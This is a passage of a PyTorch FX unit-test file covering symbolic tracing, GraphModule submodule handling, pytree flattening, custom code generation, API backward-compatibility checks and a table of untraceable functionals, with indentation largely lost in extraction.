self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_fx_stateless(self):
class MockModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.l1 = torch.nn.Linear(1, 1)
self.register_buffer('buffer', torch.ones(1))
def forward(self, x):
return self.l1(x) + self.buffer
module = MockModule()
x = torch.rand((1, 1))
weight = torch.tensor([[1.0]], requires_grad=True)
bias = torch.tensor([0.0], requires_grad=True)
buffer = torch.tensor([0.0])
parameters = {'l1.weight': weight,
'l1.bias': bias,
'buffer': buffer}
fx_module = torch.fx.symbolic_trace(module)
res = _stateless.functional_call(fx_module, parameters, x)
res.backward()
self.assertIsNotNone(weight.grad)
self.assertIsNotNone(bias.grad)
self.assertIsNone(buffer.grad)
# Gradients were not calculated for the module's own parameters and buffers
self.assertIsNone(module.l1.weight.grad)
self.assertIsNone(module.l1.bias.grad)
self.assertIsNone(module.buffer.grad)
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
    self.called = True
    self.calling = True
    try:
        return super(type(self), self).__call__(*args)
    finally:
        self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test that the custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
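# Illustration (hedged sketch, not executed): the custom pytree registration above
# means roughly
#   pytree.tree_flatten(Foo(1, 2))       -> ([1, 2], spec_for_Foo)
#   pytree.tree_unflatten([1, 2], spec)  -> Foo(1, 2)
# which is what lets symbolic_trace(..., concrete_args=...) expand a Foo argument
# into individual placeholders inside verify_pytree above.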
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
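# Rough illustration (hedged; the exact variable names are chosen by FX and may
# differ) of the forward generated once ListCodeGen is installed and nf is
# recompiled:
#
#   def forward(self, args_list: List[torch.Tensor]):
#       a, b = args_list
#       add = a + b
#       return add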
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
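# run_getitem_target temporarily appends (torch.Tensor, "__getitem__") to
# torch.fx's _wrapped_methods_to_patch so the getitem tests exercise the
# patched-method tracing path; the append/pop pair keeps that global list clean
# for any tests that run afterwards in the same process.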
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
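# Hedged sketch (not part of the test) of reusing the schema-matching loop above
# for a single op; get_signature_for_torch_op returns inspect.Signature objects,
# so bind()/apply_defaults() can validate a concrete call:
#
#   sigs = get_signature_for_torch_op(torch.add)
#   for sig in sigs:
#       try:
#           bound = sig.bind(torch.randn(2), torch.randn(2))
#           bound.apply_defaults()
#           break
#       except TypeError:
#           continue
#   else:
#       raise RuntimeError('no overload of torch.add matched the sample call')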
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
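# Hedged example of the stable string this helper produces for a hypothetical
# function (the name and signature below are illustrative only, not part of FX):
#
#   def scale(x: torch.Tensor, factor: float = 2.0) -> torch.Tensor: ...
#   _fn_to_stable_annotation_str(scale)
#   -> '<module>.scale(x: torch.Tensor, factor: float = 2.0) -> torch.Tensor'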
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
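# Illustrative (hedged) outputs of _annotation_type_to_stable_str:
#   typing.Optional[torch.Tensor]        -> 'Optional[torch.Tensor]'
#   typing.Dict[str, typing.List[int]]   -> 'Dict[str, List[int]]'
#   'Graph' (a string forward reference) -> "'Graph'"
#   typing.Callable[..., torch.Tensor]   -> 'Callable[..., torch.Tensor]'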
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
signature_strs.append(self._fn_to_stable_annotation_str(obj))
signature_strs.sort()
try:
self.assertExpected('\n'.join(signature_strs), 'fx_backcompat_function_signatures')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX function that has been marked " \
f"as backwards-compatible has experienced a signature change. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_class_member_back_compat(self):
"""
Test backward compatibility for members of classes with
@compatibility(is_backward_compatible=True). Currently this checks for
exact matches on the publicly visible members of the class.
"""
class_method_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if isinstance(obj, type):
public_members = [name for name in obj.__dict__ if not name.startswith('_')]
class_method_strs.append(f'{torch.typename(obj)} {sorted(public_members)}')
class_method_strs.sort()
try:
self.assertExpected('\n'.join(class_method_strs), 'fx_backcompat_class_members')
except AssertionError as e:
msg = f"{e}\n****** ERROR ******\nAn FX class that has been marked " \
f"as backwards-compatible has experienced change in its public members. See the " \
f"above exception context for more information. If this change was " \
f"unintended, please revert it. If it was intended, check with the FX " \
f"team to ensure that the proper deprecation protocols have been followed " \
f"and subsequently --accept the change."
raise AssertionError(msg)
def test_public_api_surface(self):
non_back_compat_objects = {}
def check_symbols_have_bc_designation(m, prefix):
if not m.__name__.startswith('torch.fx'):
return
if m.__name__.startswith('torch.fx.experimental'):
return
for k, v in m.__dict__.items():
if v is m:
continue
if k.startswith('_'):
continue
if isinstance(v, types.ModuleType):
check_symbols_have_bc_designation(v, prefix + [k])
elif isinstance(v, type) or isinstance(v, types.FunctionType):
if v not in _MARKED_WITH_COMATIBLITY:
non_back_compat_objects.setdefault(v)
check_symbols_have_bc_designation(torch.fx, ['torch', 'fx'])
check_symbols_have_bc_designation(torch.fx.passes, ['torch', 'fx', 'passes'])
non_back_compat_strs = [torch.typename(obj) for obj in non_back_compat_objects.keys()]
# Only want objects in torch.fx
non_back_compat_strs = [
s for s in non_back_compat_strs if s.startswith('torch.fx') and not s.startswith('torch.fx.experimental')]
# Only want objects in public namespaces
non_back_compat_strs = [
s for s in non_back_compat_strs if all(not atom.startswith('_') for atom in s.split('.'))]
non_back_compat_strs.sort()
if len(non_back_compat_strs) != 0:
raise AssertionError(f"Public FX API(s) {non_back_compat_strs} introduced but not given a "
f"backwards-compatibility classification! Please decorate these "
f"API(s) with `@torch.fx._compatibility.compatibility` to specify "
f"BC guarantees.")
class TestFunctionalTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
IGNORE_FUNCS = ("has_torch_function", "has_torch_function_unary",
"has_torch_function_variadic", "handle_torch_function",
"boolean_dispatch")
TO_PATCH = {"has_torch_function": None,
"has_torch_function_unary": None,
"has_torch_function_variadic": None}
BUILT_IN_FUNC = (AssertionError, "")
PROXY_ITERABLE = (TypeError, r"argument of type 'Proxy' is not iterable")
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
LEN_ERROR = (RuntimeError, r"'len' is not supported in symbolic tracing by default")
ARG_TYPE_MISMATCH = (TypeError, r", not Proxy$")
CONTROL_FLOW = (TraceError, r"symbolically traced variables cannot be used as inputs to control flow")
INTERPOLATE_ARGS_CONFLICT = (ValueError, r"only one of size or scale_factor should be defined")
MUTABLE = (RuntimeError, r"Tried to trace mutable operation")
UNTRACEABLE_FUNCTIONALS = {
"adaptive_avg_pool1d": BUILT_IN_FUNC,
"avg_pool1d": BUILT_IN_FUNC,
"avg_pool2d": BUILT_IN_FUNC,
"avg_pool3d": BUILT_IN_FUNC,
"bilinear": BUILT_IN_FUNC,
"celu_": BUILT_IN_FUNC,
"channel_shuffle": BUILT_IN_FUNC,
"native_channel_shuffle": BUILT_IN_FUNC,
"conv1d": BUILT_IN_FUNC,
"conv2d": BUILT_IN_FUNC,
"conv3d": BUILT_IN_FUNC,
"conv_tbc": BUILT_IN_FUNC,
"conv_transpose1d": BUILT_IN_FUNC,
"conv_transpose2d": BUILT_IN_FUNC,
"conv_transpose3d": BUILT_IN_FUNC,
"cosine_similarity": BUILT_IN_FUNC,
"elu_": BUILT_IN_FUNC,
"gelu": BUILT_IN_FUNC,
"hardshrink": BUILT_IN_FUNC,
"hardtanh_": BUILT_IN_FUNC,
"leaky_relu_": BUILT_IN_FUNC,
"linear": BUILT_IN_FUNC,
"logsigmoid": BUILT_IN_FUNC,
"one_hot": BUILT_IN_FUNC,
"pairwise_distance": BUILT_IN_FUNC,
"pdist": BUILT_IN_FUNC,
"pixel_shuffle": BUILT_IN_FUNC,
"pixel_unshuffle": BUILT_IN_FUNC,
"prelu": BUILT_IN_FUNC,
"relu_": BUILT_IN_FUNC,
"rrelu_": BUILT_IN_FUNC,
"selu_": BUILT_IN_FUNC,
"softplus": BUILT_IN_FUNC,
"softshrink": BUILT_IN_FUNC,
"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but without type annotations
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
